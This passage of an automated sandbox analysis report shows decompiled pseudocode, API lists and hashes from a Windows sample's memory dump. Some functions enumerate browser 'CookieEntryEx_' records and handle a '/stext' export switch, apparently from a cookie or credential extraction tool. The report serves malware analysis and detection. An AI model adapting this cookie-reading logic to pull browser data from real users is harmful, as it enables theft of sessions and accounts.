                                                                                                                                                0x004061dc
                                                                                                                                                0x004061e3
                                                                                                                                                0x004061e3

                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                • Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
                                                                                                                                                • Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
                                                                                                                                                • Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
                                                                                                                                                • Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E490, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                			E0040E490() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x413270; // 0xa10048
				if(_t1 != 0) {
					_push(_t1); // executed
					L0040E032(); // executed
				}
				_t2 =  *0x413278; // 0xb17090
				if(_t2 != 0) {
					_push(_t2);
					L0040E032();
				}
				_t3 =  *0x413274; // 0xb178a0
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
				}
				_t4 =  *0x41327c; // 0xb17498
				if(_t4 != 0) {
					_push(_t4); // executed
					L0040E032(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                0x0040e490
                                                                                                                                                0x0040e497
                                                                                                                                                0x0040e499
                                                                                                                                                0x0040e49a
                                                                                                                                                0x0040e49f
                                                                                                                                                0x0040e4a0
                                                                                                                                                0x0040e4a7
                                                                                                                                                0x0040e4a9
                                                                                                                                                0x0040e4aa
                                                                                                                                                0x0040e4af
                                                                                                                                                0x0040e4b0
                                                                                                                                                0x0040e4b7
                                                                                                                                                0x0040e4b9
                                                                                                                                                0x0040e4ba
                                                                                                                                                0x0040e4bf
                                                                                                                                                0x0040e4c0
                                                                                                                                                0x0040e4c7
                                                                                                                                                0x0040e4c9
                                                                                                                                                0x0040e4ca
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e4cf
                                                                                                                                                0x0040e4d0

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
                                                                                                                                                • Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
                                                                                                                                                • Opcode Fuzzy Hash: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
                                                                                                                                                • Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040BD40, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E0040BD40(void* __eax, void* __edx, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t34;
				signed int _t43;
				intOrPtr _t54;
				intOrPtr* _t55;
				void* _t60;
				void* _t61;
				signed int _t65;
				intOrPtr _t66;
				void* _t71;

				_t60 = __edx;
				_t54 = 0;
				_t61 = __eax;
				_v4 = 0;
				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
				 *((intOrPtr*)(_t61 + 0x208)) = 0;
				_t71 = 0;
				_v16 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
					L18:
					return _v4;
				} else {
					goto L1;
				}
				do {
					L1:
					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
						_t65 = 0x40f454;
					} else {
						_t33 = E00406306(_t33, _t54);
						_t65 = _t33;
					}
					_push(_t65);
					_push(L"/stext");
					L0040E03E();
					_pop(_t57);
					if(_t33 != 0) {
						_t34 = E0040BCAA(_t33, _t65);
						__eflags = _t34;
						if(_t34 <= 0) {
							goto L8;
						}
						goto L7;
					} else {
						_t34 = _t33 + 1;
						L7:
						_v8 = _t34;
						_t10 = _t54 + 1; // 0x2
						_t71 = _t10;
					}
					L8:
					_t54 = _t54 + 1;
				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
				_t66 = _v8;
				if(_t66 > 0) {
					E0040B147(_t61, _t57, 0); // executed
					E0040A4C2(_t61);
					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
						_t43 = 0x40f454;
					} else {
						_t57 = _t71;
						_t43 = E00406306(_t42, _t71);
					}
					_t79 = _t66 - 8;
					if(_t66 != 8) {
						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
					} else {
						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
					}
					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
					_v4 = 1;
					if(_t55 != 0) {
						 *_t55 = 0x40f648;
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
						E00403F55(_t55 + 0xbf0);
						E0040623E(_t55 + 0xbd0);
						E0040623E(_t55 + 0xbac);
						E00406355(_t55 + 0xb98);
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
						E00403FBE(_t55 + 0x350);
						E004076F4(_t55);
						_push(_t55);
						L0040E032();
					}
				}
				goto L18;
			}


















                                                                                                                                                0x0040bd40
                                                                                                                                                0x0040bd47
                                                                                                                                                0x0040bd49
                                                                                                                                                0x0040bd53
                                                                                                                                                0x0040bd57
                                                                                                                                                0x0040bd62
                                                                                                                                                0x0040bd6b
                                                                                                                                                0x0040bd70
                                                                                                                                                0x0040bd74
                                                                                                                                                0x0040be8c
                                                                                                                                                0x0040be97
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040bd7a
                                                                                                                                                0x0040bd7a
                                                                                                                                                0x0040bd7a
                                                                                                                                                0x0040bd83
                                                                                                                                                0x0040bd90
                                                                                                                                                0x0040bd85
                                                                                                                                                0x0040bd87
                                                                                                                                                0x0040bd8c
                                                                                                                                                0x0040bd8c
                                                                                                                                                0x0040bd95
                                                                                                                                                0x0040bd96
                                                                                                                                                0x0040bd9b
                                                                                                                                                0x0040bda3
                                                                                                                                                0x0040bda4
                                                                                                                                                0x0040bda9
                                                                                                                                                0x0040bdae
                                                                                                                                                0x0040bdb0
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040bda6
                                                                                                                                                0x0040bda6
                                                                                                                                                0x0040bdb2
                                                                                                                                                0x0040bdb2
                                                                                                                                                0x0040bdb6
                                                                                                                                                0x0040bdb6
                                                                                                                                                0x0040bdb6
                                                                                                                                                0x0040bdb9
                                                                                                                                                0x0040bdc2
                                                                                                                                                0x0040bdc4
                                                                                                                                                0x0040bdc8
                                                                                                                                                0x0040bdce
                                                                                                                                                0x0040bdd8
                                                                                                                                                0x0040bddf
                                                                                                                                                0x0040bde4
                                                                                                                                                0x0040bded
                                                                                                                                                0x0040bdf8
                                                                                                                                                0x0040bdef
                                                                                                                                                0x0040bdef
                                                                                                                                                0x0040bdf1
                                                                                                                                                0x0040bdf1
                                                                                                                                                0x0040bdfd
                                                                                                                                                0x0040be00
                                                                                                                                                0x0040be16
                                                                                                                                                0x0040be02
                                                                                                                                                0x0040be07
                                                                                                                                                0x0040be07
                                                                                                                                                0x0040be1b
                                                                                                                                                0x0040be23
                                                                                                                                                0x0040be2b
                                                                                                                                                0x0040be33
                                                                                                                                                0x0040be39
                                                                                                                                                0x0040be43
                                                                                                                                                0x0040be4e
                                                                                                                                                0x0040be59
                                                                                                                                                0x0040be64
                                                                                                                                                0x0040be6f
                                                                                                                                                0x0040be79
                                                                                                                                                0x0040be80
                                                                                                                                                0x0040be85
                                                                                                                                                0x0040be86
                                                                                                                                                0x0040be8b
                                                                                                                                                0x0040be2b
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040BD9B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040BE86
                                                                                                                                                  • Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$??3@
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 3682227554-3817206916
                                                                                                                                                • Opcode ID: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
                                                                                                                                                • Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
                                                                                                                                                • Opcode Fuzzy Hash: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
                                                                                                                                                • Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403EAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E00403EAC(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				void* _t21;
				void* _t22;
				void* _t24;
				WCHAR* _t27;
				signed int _t28;
				signed int _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t29 = _t28 & 0xfffffff8;
				_push(__ecx);
				_push(__ecx);
				_t9 = E004039F6(__edi); // executed
				_t24 = 0;
				_v8 = _t9;
				if(_t9 != 0) {
					L7:
					return _v8;
				}
				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
					L5:
					E0040405E(_t22 + 4);
					_t27 = _t22 + 0x430;
					if( *_t27 != 0) {
						DeleteFileW(_t27); // executed
						 *_t27 =  *_t27 & 0x00000000;
					}
					goto L7;
				} else {
					goto L2;
				}
				do {
					L2:
					_t14 = E00403F2B(_t24, _t22 + 0x420);
					_push(0xe);
					_t18 = _t14;
					_push(L"CookieEntryEx_");
					_push(_t14);
					L0040E044();
					_t29 = _t29 + 0xc;
					if(_t14 == 0) {
						E00403BAF(_t21, _t22, _t18); // executed
					}
					_t24 = _t24 + 1;
				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
				goto L5;
			}













                                                                                                                                                0x00403eac
                                                                                                                                                0x00403eac
                                                                                                                                                0x00403eaf
                                                                                                                                                0x00403eb2
                                                                                                                                                0x00403eb3
                                                                                                                                                0x00403eb8
                                                                                                                                                0x00403ebd
                                                                                                                                                0x00403ec1
                                                                                                                                                0x00403ec5
                                                                                                                                                0x00403f21
                                                                                                                                                0x00403f2a
                                                                                                                                                0x00403f2a
                                                                                                                                                0x00403ecd
                                                                                                                                                0x00403f02
                                                                                                                                                0x00403f05
                                                                                                                                                0x00403f0a
                                                                                                                                                0x00403f14
                                                                                                                                                0x00403f17
                                                                                                                                                0x00403f1d
                                                                                                                                                0x00403f1d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00403ecf
                                                                                                                                                0x00403ecf
                                                                                                                                                0x00403ed7
                                                                                                                                                0x00403edc
                                                                                                                                                0x00403ede
                                                                                                                                                0x00403ee0
                                                                                                                                                0x00403ee5
                                                                                                                                                0x00403ee6
                                                                                                                                                0x00403eeb
                                                                                                                                                0x00403ef0
                                                                                                                                                0x00403ef4
                                                                                                                                                0x00403ef4
                                                                                                                                                0x00403ef9
                                                                                                                                                0x00403efa
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
                                                                                                                                                  • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
                                                                                                                                                  • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
                                                                                                                                                  • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77
                                                                                                                                                • _wcsnicmp.MSVCRT ref: 00403EE6
                                                                                                                                                  • Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA
                                                                                                                                                • DeleteFileW.KERNELBASE(?), ref: 00403F17
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$DeleteFile_wcsnicmp
                                                                                                                                                • String ID: CookieEntryEx_
                                                                                                                                                • API String ID: 3258848388-47494461
                                                                                                                                                • Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                • Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
                                                                                                                                                • Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                • Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406785, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                			E00406785() {
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x413288;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x413288 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41328c = 0x100;
					 *0x413290 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
					L0040E038(); // executed
					 *0x413270 = _t27;
					_t28 =  *0x41328c; // 0x100
					_t52 = 4;
					_t29 = _t28 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040E038();
					 *0x413278 = _t29;
					_t30 =  *0x41328c; // 0x100
					_t54 = 4;
					_t31 = _t30 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040E038();
					 *0x41327c = _t31;
					_t32 =  *0x413290; // 0x1000
					_t56 = 2;
					_t33 = _t32 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
					L0040E038(); // executed
					 *0x413274 = _t33;
					return _t33;
				}
				return _t25;
			}
















                                                                                                                                                0x00406785
                                                                                                                                                0x0040678c
                                                                                                                                                0x0040679b
                                                                                                                                                0x0040679c
                                                                                                                                                0x004067a1
                                                                                                                                                0x004067a6
                                                                                                                                                0x004067b0
                                                                                                                                                0x004067be
                                                                                                                                                0x004067bf
                                                                                                                                                0x004067c4
                                                                                                                                                0x004067c9
                                                                                                                                                0x004067d2
                                                                                                                                                0x004067d3
                                                                                                                                                0x004067dc
                                                                                                                                                0x004067dd
                                                                                                                                                0x004067e2
                                                                                                                                                0x004067e7
                                                                                                                                                0x004067f0
                                                                                                                                                0x004067f1
                                                                                                                                                0x004067fa
                                                                                                                                                0x004067fb
                                                                                                                                                0x00406800
                                                                                                                                                0x00406805
                                                                                                                                                0x0040680e
                                                                                                                                                0x0040680f
                                                                                                                                                0x00406818
                                                                                                                                                0x00406819
                                                                                                                                                0x00406821
                                                                                                                                                0x00000000
                                                                                                                                                0x00406821
                                                                                                                                                0x00406826

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                • Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
                                                                                                                                                • Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                • Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040567E, Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040567E(WCHAR* __edi, WCHAR* _a4) {
				short _v524;
				WCHAR* _t12;

				_t12 = __edi;
				if(GetTempPathW(0x104,  &_v524) == 0) {
					GetWindowsDirectoryW( &_v524, 0x104);
				}
				 *_t12 =  *_t12 & 0x00000000;
				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
				return _t12;
			}





                                                                                                                                                0x0040567e
                                                                                                                                                0x0040569d
                                                                                                                                                0x004056a7
                                                                                                                                                0x004056a7
                                                                                                                                                0x004056ad
                                                                                                                                                0x004056be
                                                                                                                                                0x004056c8

                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00405695
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                • Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
                                                                                                                                                • Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
                                                                                                                                                • Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
                                                                                                                                                • Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00404070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void* _t15;

				_t17 =  *(__esi[0x106] + 0xec);
				_t11 = _a8 + 1;
				_push(0);
				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
				return _t14;
			}





                                                                                                                                                0x00404077
                                                                                                                                                0x00404081
                                                                                                                                                0x00404084
                                                                                                                                                0x0040408c
                                                                                                                                                0x00404099
                                                                                                                                                0x004040a2

                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                  • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                • String ID: F@@
                                                                                                                                                • API String ID: 3154509469-234039029
                                                                                                                                                • Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
                                                                                                                                                • Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
                                                                                                                                                • Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
                                                                                                                                                • Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004096FE, Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t34;
				void* _t42;
				void* _t44;
				void* _t51;
				signed int _t54;
				intOrPtr* _t58;
				void* _t62;

				_t62 = __eflags;
				_t51 = __edx;
				_push(_t44);
				_push(_t44);
				_t54 = 0;
				_t58 = __eax;
				_v8 = 0;
				E0040951A(__eax, _a8);
				E00407A66(_t58, _t62);
				_t23 = _a4;
				if( *_a4 == 0) {
					_t24 = GetStdHandle(0xfffffff5);
				} else {
					_t24 = E00405351(_t23);
					_pop(_t44);
				}
				_t42 = _t24;
				if(_t42 == 0xffffffff) {
					__eflags = 0;
					E004053B1(0, 0, _t54);
				} else {
					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
							_push(2);
							_push(0x40ff4c);
						} else {
							_push(3);
							_push(0x40ff48);
						}
						_push(_t42); // executed
						E00405E62(_t44); // executed
					}
					_v8 = 1;
					E0040528C();
					E00409C22(_t58, _t51, _t42, _a8); // executed
					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
						do {
							_t34 = E00407588(_t58, _t54);
							_push(_t34);
							_v12 = _t34;
							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
								goto L12;
							} else {
								_push(_a8);
								_push(_v12);
								_push(_t42); // executed
								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
									_v8 = _v8 & 0x00000000;
									__eflags = 0;
									E004053B1(0, 0, 0);
								} else {
									goto L12;
								}
							}
							goto L15;
							L12:
							_t54 = _t54 + 1;
						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
					}
					L15:
					E00409BE4(_a8, _t58, _t42);
					if( *_a4 != 0) {
						FindCloseChangeNotification(_t42); // executed
					}
					E004052A6();
				}
				return _v8;
			}

















                                                                                                                                                0x004096fe
                                                                                                                                                0x004096fe
                                                                                                                                                0x00409701
                                                                                                                                                0x00409702
                                                                                                                                                0x00409709
                                                                                                                                                0x0040970b
                                                                                                                                                0x0040970d
                                                                                                                                                0x00409710
                                                                                                                                                0x00409717
                                                                                                                                                0x0040971c
                                                                                                                                                0x00409722
                                                                                                                                                0x0040972f
                                                                                                                                                0x00409724
                                                                                                                                                0x00409725
                                                                                                                                                0x0040972a
                                                                                                                                                0x0040972a
                                                                                                                                                0x00409735
                                                                                                                                                0x0040973a
                                                                                                                                                0x004097e0
                                                                                                                                                0x004097e2
                                                                                                                                                0x00409740
                                                                                                                                                0x00409743
                                                                                                                                                0x00409748
                                                                                                                                                0x00409753
                                                                                                                                                0x00409755
                                                                                                                                                0x0040974a
                                                                                                                                                0x0040974a
                                                                                                                                                0x0040974c
                                                                                                                                                0x0040974c
                                                                                                                                                0x0040975a
                                                                                                                                                0x0040975b
                                                                                                                                                0x00409760
                                                                                                                                                0x00409763
                                                                                                                                                0x0040976a
                                                                                                                                                0x00409775
                                                                                                                                                0x0040977d
                                                                                                                                                0x0040977f
                                                                                                                                                0x00409780
                                                                                                                                                0x00409787
                                                                                                                                                0x0040978a
                                                                                                                                                0x00409792
                                                                                                                                                0x00000000
                                                                                                                                                0x00409794
                                                                                                                                                0x00409794
                                                                                                                                                0x00409799
                                                                                                                                                0x0040979e
                                                                                                                                                0x004097a7
                                                                                                                                                0x004097b1
                                                                                                                                                0x004097b7
                                                                                                                                                0x004097b9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004097a7
                                                                                                                                                0x00000000
                                                                                                                                                0x004097a9
                                                                                                                                                0x004097a9
                                                                                                                                                0x004097aa
                                                                                                                                                0x004097af
                                                                                                                                                0x004097bf
                                                                                                                                                0x004097c3
                                                                                                                                                0x004097cf
                                                                                                                                                0x004097d2
                                                                                                                                                0x004097d2
                                                                                                                                                0x004097d8
                                                                                                                                                0x004097d8
                                                                                                                                                0x004097ef

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                  • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
